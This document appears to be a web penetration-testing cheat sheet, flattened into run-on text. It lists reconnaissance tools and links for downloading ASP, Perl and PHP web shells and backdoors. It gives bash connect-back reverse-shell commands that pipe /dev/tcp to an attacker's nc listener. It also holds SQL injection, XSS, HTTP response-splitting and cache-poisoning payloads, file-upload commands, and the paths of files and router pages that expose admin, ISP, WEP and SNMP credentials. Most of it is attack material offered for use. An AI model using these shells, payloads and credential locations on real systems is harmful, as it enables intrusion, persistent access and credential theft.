Skip to content
Fingerprint serverTelnet ip_address port Firefox plugins Crawl websitelynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html Web Directory enumeration Vulnerability AssessmentManual TestsDefault Passwords Install BackdoorsASPhttp://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt Assortedhttp://michaeldaw.org/projects/web-backdoor-compilation/ http://open-labs.org/hacker_webkit02.tar.gz Perlhttp://home.arcor.de/mschierlm/test/pmsh.pl http://pentestmonkey.net/tools/perl-reverse-shell/ http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz PHPhttp://php.spb.ru/remview/ http://pentestmonkey.net/tools/php-reverse-shell/ http://pentestmonkey.net/tools/php-findsock-shell/ Pythonhttp://matahari.sourceforge.net/ TCLhttp://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes Bash Connect Back ShellGnuCitizen Atttack Box: nc -l -p Port -vvv Victim: $ exec 5<>/dev/tcp/IP_Address/PortVictim: $ cat <&5 | while read line; do $line 2>&5 >&5; done Neohapsis Atttack Box: nc -l -p Port -vvv Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdinVictim: $ exec 1>&0 # Next we copy stdin to stdoutVictim: $ exec 2>&0 # And finally stdin to stderrVictim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0 Method Testingnc IP_Adress PortHEAD / HTTP/1.0 OPTIONS / HTTP/1.0 PROPFIND / HTTP/1.0 TRACE / HTTP/1.1 PUT http://Target_URL/FILE_NAME POST http://Target_URL/FILE_NAME HTTP/1.x Upload Filescurlcurl -u <username:password> -T file_to_upload <Target_URL> curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” <Target_URL> put.pl put.pl -h target -r /remote_file_name -f local_file_name webdav View Page SourceHidden Values Developer Remarks Extraneous Code Passwords! Input Validation Checks NULL or nullPossible error messages returned. ‘ , ” , ; , <!Breaks an SQL string or query; used for SQL, XPath and XML Injection tests. – , = , + , “Used to craft SQL Injection queries. ‘ , &, ! , ¦ , < , >Used to find command execution vulnerabilities. “><script>alert(1)</script>Basic Cross-Site Scripting Checks. %0d%0aCarriage Return (%0d) Line Feed (%0a)HTTP Splittinglanguage=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html> Cache Poisoninglanguage=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html> %7f , %ffbyte-length overflows; maximum 7- and 8-bit values. -1, otherInteger and underflow vulnerabilities. %n , %x , %sTesting for format string vulnerabilities. ../Directory Traversal Vulnerabilities. % , _, *Wildcard characters can sometimes present DoS issues or information disclosure. Ax1024+Overflow vulnerabilities. Automated table and column iterationorderby.py ./orderby.py www.site.com/index.php?id= d3sqlfuzz.py ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE– Vulnerability Scanners Specific Applications/ Server ToolsDomino Joomlacms_few joomsq joomlascan ./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don’t show 404 responses] joomscan ./joomscan.py -u “www.site.com/joomladir/” -o site.txt -p 127.0.0.1:80 jscan jscan.pl -f hostname (shell.txt required) aspaudit.pl asp-audit.pl http://target/app/filename.aspx (options i.e. -bf) Vbulletinvbscan.py vbscan.py <host> <port> -v vbscan.py -update ZyXelzyxel-bf.sh snmpwalksnmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2 snmpgetsnmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0 Proxy Testing Examine configuration filesGenericExamine httpd.conf/ windows config files JBoss JMX Console http://<IP>:8080/jmxconcole/ Joomlaconfiguration.php diagnostics.php joomla.inc.php config.inc.php Mamboconfiguration.php config.inc.php WordPresssetup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups/RestoreCfg.html /BackupCfg.html Note: – The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings Examine web server logsc:\winnt\system32\Logfiles\W3SVC1awk -F ” ” ‘{print $3,$11} filename | sort | uniq References Exploit Frameworks
Post navigation